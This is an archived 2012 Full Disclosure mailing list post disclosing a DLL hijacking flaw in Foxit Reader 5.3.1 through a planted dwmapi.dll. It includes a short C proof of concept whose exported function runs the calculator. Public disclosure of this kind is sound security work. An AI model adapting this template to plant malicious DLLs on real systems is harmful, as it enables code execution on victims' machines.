|
Full Disclosure
mailing list archives
foxit reader 5.3.1(dwmapi.dll) DLL Hijacking Exploit
From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Thu, 23 Aug 2012 04:21:01 -0700
Exploit Title: foxit reader 5.3.1(dwmapi.dll) DLL Hijacking Exploit
Date: 2012-08-23
Author: coolkaveh
coolkaveh () rocketmail com
Greets To Mohammad Morteza Sanaie
sanaie.morteza () gmail com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.foxitsoftware.com/
Version: 5.3.1.0606
Tested on: windows XP Sp3 ENG
---------------------------------------------------------
# Vulnerable: foxit reader.exe
---------------------------------------------------------
# Vulnerable extensions: .pdf
---------------------------------------------------------
# Vulnerable Dll: dwmapi.dll
---------------------------------------------------------
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void hook_startup() { exp(); }
int exp()
{
WinExec("calc", 0);
exit(0);
return 0;
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
By Date
By Thread
Current thread:
- foxit reader 5.3.1(dwmapi.dll) DLL Hijacking Exploit kaveh ghaemmaghami (Aug 23)
|